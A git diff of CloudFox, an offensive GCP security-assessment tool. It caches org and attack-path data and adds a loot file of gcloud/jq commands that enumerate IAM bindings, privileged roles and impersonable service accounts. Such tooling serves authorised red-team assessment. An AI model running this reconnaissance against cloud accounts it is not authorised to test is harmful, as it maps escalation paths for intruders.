(o LoggingGapsOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPLoggingGapsCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGGAPS_MODULE_NAME) - if err != nil { - return - } - - module := &LoggingGapsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ProjectGaps: make(map[string][]logginggapsservice.LoggingGap), - ProjectAuditConfigs: make(map[string]*logginggapsservice.AuditLogConfig), - LootMap: make(map[string]map[string]*internal.LootFile), - } - - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *LoggingGapsModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGGAPS_MODULE_NAME, m.processProject) - - allGaps := m.getAllGaps() - if len(allGaps) == 0 { - logger.InfoM("No logging gaps found", globals.GCP_LOGGINGGAPS_MODULE_NAME) - return - } - - logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(allGaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) - - m.writeOutput(ctx, logger) -} - -func (m *LoggingGapsModule) getAllGaps() []logginggapsservice.LoggingGap { - var all []logginggapsservice.LoggingGap - for _, gaps := range m.ProjectGaps { - all = append(all, gaps...) - } - return all -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Scanning logging gaps in project: %s", projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) - } - - m.mu.Lock() - // Initialize loot for this project - if m.LootMap[projectID] == nil { - m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["logging-gaps-commands"] = &internal.LootFile{ - Name: "logging-gaps-commands", - Contents: "# Logging Gaps Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - } - m.mu.Unlock() - - svc := logginggapsservice.New() - gaps, auditConfig, err := svc.EnumerateLoggingGaps(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGGAPS_MODULE_NAME, - fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) - return - } - - m.mu.Lock() - m.ProjectGaps[projectID] = gaps - if auditConfig != nil { - m.ProjectAuditConfigs[projectID] = auditConfig - } - - for _, gap := range gaps { - m.addGapToLoot(projectID, gap) - } - m.mu.Unlock() - - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d logging gap(s) in project %s", len(gaps), projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) - } -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *LoggingGapsModule) addGapToLoot(projectID string, gap logginggapsservice.LoggingGap) { - lootFile := m.LootMap[projectID]["logging-gaps-commands"] - if lootFile == nil { - return - } - lootFile.Contents += fmt.Sprintf( - "## %s: %s (Project: %s, Location: %s)\n"+ - "# Status: %s\n"+ - "# Missing:\n", - gap.ResourceType, gap.ResourceName, - gap.ProjectID, gap.Location, - gap.LoggingStatus, - ) - for _, missing := range gap.MissingLogs { - lootFile.Contents += fmt.Sprintf("# - %s\n", missing) - } - lootFile.Contents += "\n" - - // Add exploit commands - if len(gap.ExploitCommands) > 0 { - for _, cmd := range gap.ExploitCommands { - lootFile.Contents += cmd + "\n" - } - lootFile.Contents += "\n" - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Logger) { - if m.Hierarchy != nil && !m.FlatOutput { - m.writeHierarchicalOutput(ctx, logger) - } else { - m.writeFlatOutput(ctx, logger) - } -} - -func (m *LoggingGapsModule) getHeader() []string { - return []string{ - "Project ID", - "Project Name", - "Type", - "Resource", - "Location", - "Status", - "Missing Logs", - } -} - -func (m *LoggingGapsModule) gapsToTableBody(gaps []logginggapsservice.LoggingGap) [][]string { - var body [][]string - for _, gap := range gaps { - missingLogs := strings.Join(gap.MissingLogs, "; ") - - location := gap.Location - if location == "" { - location = "-" - } - - body = append(body, []string{ - gap.ProjectID, - m.GetProjectName(gap.ProjectID), - gap.ResourceType, - gap.ResourceName, - location, - gap.LoggingStatus, - missingLogs, - }) - } - return body -} - -func (m *LoggingGapsModule) buildTablesForProject(projectID string) []internal.TableFile { - var tableFiles []internal.TableFile - - if gaps, ok := m.ProjectGaps[projectID]; ok && len(gaps) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "logging-gaps", - Header: m.getHeader(), - Body: m.gapsToTableBody(gaps), - }) - } - - return tableFiles -} - -func (m *LoggingGapsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { - outputData := internal.HierarchicalOutputData{ - OrgLevelData: make(map[string]internal.CloudfoxOutput), - ProjectLevelData: make(map[string]internal.CloudfoxOutput), - } - - for projectID := range m.ProjectGaps { - tableFiles := m.buildTablesForProject(projectID) - - var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - outputData.ProjectLevelData[projectID] = LoggingGapsOutput{Table: tableFiles, Loot: lootFiles} - } - - pathBuilder := m.BuildPathBuilder() - - err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGINGGAPS_MODULE_NAME) - } -} - -func (m *LoggingGapsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { - allGaps := m.getAllGaps() - - var tables []internal.TableFile - - if len(allGaps) > 0 { - tables = append(tables, internal.TableFile{ - Name: "logging-gaps", - Header: m.getHeader(), - Body: m.gapsToTableBody(allGaps), - }) - } - - var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - output := LoggingGapsOutput{ - Table: tables, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGGAPS_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index d9e16515..03f3f8fd 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -1373,8 +1373,7 @@ func (m *NetworkTopologyModule) getNetworksHeader() []string { func (m *NetworkTopologyModule) getSubnetsHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Subnet", "Network", "Region", @@ -1382,8 +1381,8 @@ func (m *NetworkTopologyModule) getSubnetsHeader() []string { "Private Google Access", "Flow Logs", "Purpose", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -1448,7 +1447,6 @@ func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string for _, binding := range s.IAMBindings { body = append(body, []string{ m.GetProjectName(s.ProjectID), - s.ProjectID, s.Name, m.extractNetworkName(s.Network), s.Region, @@ -1464,7 +1462,6 @@ func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string // No IAM bindings - single row body = append(body, []string{ m.GetProjectName(s.ProjectID), - s.ProjectID, s.Name, m.extractNetworkName(s.Network), s.Region, diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 8bf6d46a..c87111ac 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -197,7 +197,7 @@ func (m *NotebooksModule) getInstancesHeader() []string { "State", "Machine Type", "Service Account", - "Attack Paths", + "SA Attack Paths", "Network", "Subnet", "Public IP", @@ -218,7 +218,7 @@ func (m *NotebooksModule) getRuntimesHeader() []string { "Type", "Machine Type", "Service Account", - "Attack Paths", + "SA Attack Paths", "Network", "Subnet", } @@ -237,7 +237,7 @@ func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.Note } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = m.AttackPathCache.GetAttackSummary(sa) @@ -292,7 +292,7 @@ func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.Runtim } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "-" && sa != "" { attackPaths = m.AttackPathCache.GetAttackSummary(sa) diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index db94202a..a64be237 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -85,28 +85,94 @@ func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) { func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logger) { orgsSvc := orgsservice.New() - // Get organizations - orgs, err := orgsSvc.SearchOrganizations() - if err != nil { - logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + // Check if org cache is available (from all-checks or --org-cache flag) + if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && orgCache.IsPopulated() { + logger.InfoM("Using cached organization data", globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Convert cached data to module format + for _, org := range orgCache.Organizations { + m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + }) + } + for _, folder := range orgCache.Folders { + m.Folders = append(m.Folders, orgsservice.FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + } + for _, project := range orgCache.AllProjects { + m.Projects = append(m.Projects, orgsservice.ProjectInfo{ + Name: project.Name, + ProjectID: project.ID, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } } else { - m.Organizations = orgs - } + // No context cache, try loading from disk cache + diskCache, metadata, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, %d projects)", + metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.TotalProjects), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Convert cached data to module format + for _, org := range diskCache.Organizations { + m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + }) + } + for _, folder := range diskCache.Folders { + m.Folders = append(m.Folders, orgsservice.FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + } + for _, project := range diskCache.AllProjects { + m.Projects = append(m.Projects, orgsservice.ProjectInfo{ + Name: project.Name, + ProjectID: project.ID, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } else { + // No disk cache either, enumerate directly and save + logger.InfoM("Enumerating organizations, folders, and projects...", globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Get organizations + orgs, err := orgsSvc.SearchOrganizations() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Organizations = orgs + } - // Get all folders - folders, err := orgsSvc.SearchAllFolders() - if err != nil { - logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) - } else { - m.Folders = folders - } + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Folders = folders + } - // Get all projects - projects, err := orgsSvc.SearchProjects("") - if err != nil { - logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) - } else { - m.Projects = projects + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Projects = projects + } + + // Save to disk cache for future use + m.saveToOrgCache(logger) + } } // Get ancestry for each specified project @@ -471,6 +537,49 @@ func (m *OrganizationsModule) getOrgName(orgID string) string { return orgID } +// saveToOrgCache saves enumerated org data to disk cache +func (m *OrganizationsModule) saveToOrgCache(logger internal.Logger) { + cache := gcpinternal.NewOrgCache() + + // Convert module data to cache format + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + cache.AddOrganization(gcpinternal.CachedOrganization{ + ID: orgID, + Name: org.Name, + DisplayName: org.DisplayName, + }) + } + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + cache.AddFolder(gcpinternal.CachedFolder{ + ID: folderID, + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + } + for _, project := range m.Projects { + cache.AddProject(gcpinternal.CachedProject{ + ID: project.ProjectID, + Name: project.Name, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + cache.MarkPopulated() + + // Save to disk + err := gcpinternal.SaveOrgCacheToFile(cache, m.OutputDirectory, m.Account, "1.0") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not save org cache: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Saved org cache to disk (%d orgs, %d folders, %d projects)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } +} + // ------------------------------ // Output Generation // ------------------------------ diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index 018d3269..fd70dfdb 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -94,13 +94,14 @@ type PermissionsModule struct { gcpinternal.BaseGCPModule // Module-specific fields - now per-project for hierarchical output - ProjectPerms map[string][]ExplodedPermission // projectID -> permissions - OrgPerms map[string][]ExplodedPermission // orgID -> org-level permissions - EntityPermissions []IAMService.EntityPermissions // Legacy: aggregated for stats - GroupInfos []IAMService.GroupInfo // Legacy: aggregated for stats - OrgBindings []IAMService.PolicyBinding // org-level bindings - FolderBindings map[string][]IAMService.PolicyBinding // folder-level bindings - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + ProjectPerms map[string][]ExplodedPermission // projectID -> permissions + OrgPerms map[string][]ExplodedPermission // orgID -> org-level permissions + EntityPermissions []IAMService.EntityPermissions // Legacy: aggregated for stats + GroupInfos []IAMService.GroupInfo // Legacy: aggregated for stats + OrgBindings []IAMService.PolicyBinding // org-level bindings + FolderBindings map[string][]IAMService.PolicyBinding // folder-level bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + EnumLoot *internal.LootFile // permissions-enumeration loot file mu sync.Mutex // Organization info for output path @@ -139,8 +140,12 @@ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { LootMap: make(map[string]map[string]*internal.LootFile), OrgIDs: []string{}, OrgNames: make(map[string]string), + EnumLoot: &internal.LootFile{Name: "permissions-enumeration", Contents: ""}, } + // Initialize enumeration loot file + module.initializeEnumerationLoot() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -205,6 +210,9 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) } } + // Generate enumeration loot after all projects are processed + m.generateEnumerationLoot() + m.writeOutput(ctx, logger) } @@ -490,6 +498,177 @@ func isHighPrivilegePermission(permission string) bool { return false } +// initializeEnumerationLoot initializes the enumeration loot file +func (m *PermissionsModule) initializeEnumerationLoot() { + m.EnumLoot.Contents = "# GCP Permissions Enumeration Commands\n" + m.EnumLoot.Contents += "# Generated by CloudFox\n" + m.EnumLoot.Contents += "# Use these commands to enumerate entities, roles, and permissions\n\n" +} + +// generateEnumerationLoot generates commands to enumerate permissions +func (m *PermissionsModule) generateEnumerationLoot() { + loot := m.EnumLoot + + // Add organization-level enumeration commands + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for organization\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + + loot.Contents += fmt.Sprintf("# List all roles and their members at organization level\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"Role: \\(.role)\\nMembers: \\(.members | join(\", \"))\\n\"'\n\n", orgID) + + loot.Contents += fmt.Sprintf("# Get permissions for a specific role (replace ROLE_NAME)\n") + loot.Contents += fmt.Sprintf("gcloud iam roles describe ROLE_NAME --format=json | jq -r '.includedPermissions[]'\n\n") + } + + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for project\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all roles and their members at project level\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"Role: \\(.role)\\nMembers: \\(.members | join(\", \"))\\n\"'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Find all entities with a specific role (replace ROLE_NAME, e.g., roles/owner)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role == \"ROLE_NAME\") | .members[]'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Get all roles for a specific entity (replace ENTITY, e.g., user:email@example.com)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"ENTITY\")) | .role'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all service accounts and their IAM policy\n") + loot.Contents += fmt.Sprintf("for sa in $(gcloud iam service-accounts list --project=%s --format='value(email)'); do echo \"=== $sa ===\"; gcloud iam service-accounts get-iam-policy $sa --project=%s --format=json 2>/dev/null | jq -r '.bindings[] | \"\\(.role): \\(.members | join(\", \"))\"' 2>/dev/null || echo \"No IAM policy\"; done\n\n", projectID, projectID) + + loot.Contents += fmt.Sprintf("# List all custom roles with their permissions\n") + loot.Contents += fmt.Sprintf("for role in $(gcloud iam roles list --project=%s --format='value(name)'); do echo \"=== $role ===\"; gcloud iam roles describe $role --project=%s --format=json | jq -r '.includedPermissions[]' 2>/dev/null; done\n\n", projectID, projectID) + + loot.Contents += fmt.Sprintf("# Get permissions for a predefined role\n") + loot.Contents += fmt.Sprintf("gcloud iam roles describe roles/editor --format=json | jq -r '.includedPermissions[]'\n\n") + } + + // Add entity-specific enumeration based on discovered permissions + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# Entity-Specific Permission Enumeration\n") + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + // Collect unique entities with their roles + entityRoles := make(map[string]map[string]bool) // entity -> set of roles + entityTypes := make(map[string]string) // entity -> type + + allPerms := m.getAllExplodedPerms() + for _, ep := range allPerms { + if ep.EntityEmail == "" { + continue + } + if entityRoles[ep.EntityEmail] == nil { + entityRoles[ep.EntityEmail] = make(map[string]bool) + } + entityRoles[ep.EntityEmail][ep.Role] = true + entityTypes[ep.EntityEmail] = ep.EntityType + } + + // Generate commands for each entity type + for entity, roles := range entityRoles { + entityType := entityTypes[entity] + + // Convert roles set to slice + var roleList []string + for role := range roles { + roleList = append(roleList, role) + } + sort.Strings(roleList) + + switch entityType { + case "ServiceAccount": + loot.Contents += fmt.Sprintf("# Service Account: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + // Extract project from SA email + saProject := "" + parts := strings.Split(entity, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } + } + + if saProject != "" { + loot.Contents += fmt.Sprintf("# Describe service account\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts describe %s --project=%s --format=json\n", entity, saProject) + + loot.Contents += fmt.Sprintf("# Get IAM policy on the service account itself\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts get-iam-policy %s --project=%s --format=json\n", entity, saProject) + } + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + // Custom role - need to describe with full path + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + + case "User": + loot.Contents += fmt.Sprintf("# User: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + + case "Group": + loot.Contents += fmt.Sprintf("# Group: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + } + } + + // Add high-privilege permission search commands + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# High-Privilege Permission Search\n") + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + loot.Contents += fmt.Sprintf("# Find entities with setIamPolicy permissions\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role | test(\"admin|owner|editor\"; \"i\")) | \"\\(.role): \\(.members | join(\", \"))\"'\n", projectID) + } + loot.Contents += "\n" + + loot.Contents += fmt.Sprintf("# Find service accounts that can be impersonated\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role | test(\"serviceAccountUser|serviceAccountTokenCreator\"; \"i\")) | \"\\(.role): \\(.members | join(\", \"))\"'\n", projectID) + } + loot.Contents += "\n" +} + // PermFederatedIdentityInfo contains parsed information about a federated identity type PermFederatedIdentityInfo struct { IsFederated bool @@ -682,6 +861,10 @@ func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger } } } + // Add enumeration loot file + if m.EnumLoot != nil && m.EnumLoot.Contents != "" { + allLootFiles = append(allLootFiles, *m.EnumLoot) + } if orgID != "" { // DUAL OUTPUT: Complete aggregated output at org level @@ -764,6 +947,10 @@ func (m *PermissionsModule) writeFlatOutput(ctx context.Context, logger internal } } } + // Add enumeration loot file + if m.EnumLoot != nil && m.EnumLoot.Contents != "" { + lootFiles = append(lootFiles, *m.EnumLoot) + } tables := []internal.TableFile{{ Name: "permissions", diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go index 31cc61f7..47d6b139 100644 --- a/gcp/commands/privateserviceconnect.go +++ b/gcp/commands/privateserviceconnect.go @@ -352,22 +352,22 @@ func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger in func (m *PrivateServiceConnectModule) getPSCEndpointsHeader() []string { return []string{ - "Project Name", "Project ID", "Name", "Region", "Network", + "Project", "Name", "Region", "Network", "Subnet", "IP Address", "Target Type", "Target", "State", } } func (m *PrivateServiceConnectModule) getPrivateConnectionsHeader() []string { return []string{ - "Project Name", "Project ID", "Name", "Network", "Service", + "Project", "Name", "Network", "Service", "Peering Name", "Reserved Ranges", "Accessible Services", } } func (m *PrivateServiceConnectModule) getServiceAttachmentsHeader() []string { return []string{ - "Project Name", "Project ID", "Name", "Region", "Target Service", - "Accept Policy", "Connected", "NAT Subnets", "Resource Role", "Resource Principal", + "Project", "Name", "Region", "Target Service", + "Accept Policy", "Connected", "NAT Subnets", "IAM Binding Role", "IAM Binding Principal", } } @@ -375,7 +375,7 @@ func (m *PrivateServiceConnectModule) pscEndpointsToTableBody(endpoints []networ var body [][]string for _, ep := range endpoints { body = append(body, []string{ - m.GetProjectName(ep.ProjectID), ep.ProjectID, ep.Name, ep.Region, + m.GetProjectName(ep.ProjectID), ep.Name, ep.Region, ep.Network, ep.Subnetwork, ep.IPAddress, ep.TargetType, ep.Target, ep.ConnectionState, }) } @@ -394,7 +394,7 @@ func (m *PrivateServiceConnectModule) privateConnectionsToTableBody(conns []netw accessibleServices = strings.Join(conn.AccessibleServices, ", ") } body = append(body, []string{ - m.GetProjectName(conn.ProjectID), conn.ProjectID, conn.Name, conn.Network, + m.GetProjectName(conn.ProjectID), conn.Name, conn.Network, conn.Service, conn.PeeringName, reservedRanges, accessibleServices, }) } @@ -411,14 +411,14 @@ func (m *PrivateServiceConnectModule) serviceAttachmentsToTableBody(attachments if len(att.IAMBindings) > 0 { for _, binding := range att.IAMBindings { body = append(body, []string{ - m.GetProjectName(att.ProjectID), att.ProjectID, att.Name, att.Region, + m.GetProjectName(att.ProjectID), att.Name, att.Region, att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), natSubnets, binding.Role, binding.Member, }) } } else { body = append(body, []string{ - m.GetProjectName(att.ProjectID), att.ProjectID, att.Name, att.Region, + m.GetProjectName(att.ProjectID), att.Name, att.Region, att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), natSubnets, "-", "-", }) diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 3c4ae96d..29e9fc8d 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -123,13 +123,49 @@ func runGCPPrivescCommand(cmd *cobra.Command, args []string) { func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Analyzing privilege escalation paths across organizations, folders, projects, and resources...", globals.GCP_PRIVESC_MODULE_NAME) - // Use attackpathService with "privesc" path type - svc := attackpathservice.New() - result, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "privesc") - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Failed to analyze privilege escalation") - return + var result *attackpathservice.CombinedAttackPathData + + // Check if attack path analysis was already run (via --attack-paths flag) + // to avoid duplicate enumeration + if cache := gcpinternal.GetAttackPathCacheFromContext(ctx); cache != nil && cache.HasRawData() { + if cachedResult, ok := cache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { + logger.InfoM("Using cached attack path analysis results", globals.GCP_PRIVESC_MODULE_NAME) + // Filter to only include privesc paths (cache has all types) + result = filterPrivescPaths(cachedResult) + } + } + + // If no context cache, try loading from disk cache + if result == nil { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.HasRawData() { + if cachedResult, ok := diskCache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { + logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, projects: %v)", + metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.ProjectsIn), globals.GCP_PRIVESC_MODULE_NAME) + // Filter to only include privesc paths + result = filterPrivescPaths(cachedResult) + } + } + } + + // If no cached data, run the analysis and save to disk + if result == nil { + logger.InfoM("Running privilege escalation analysis...", globals.GCP_PRIVESC_MODULE_NAME) + svc := attackpathservice.New() + var err error + // Run full analysis (all types) so we can cache for other modules + fullResult, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "all") + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Failed to analyze privilege escalation") + return + } + + // Save to disk cache for future use (skip if running under all-checks) + m.saveToAttackPathCache(ctx, fullResult, logger) + + // Filter to only include privesc paths for this module + result = filterPrivescPaths(fullResult) 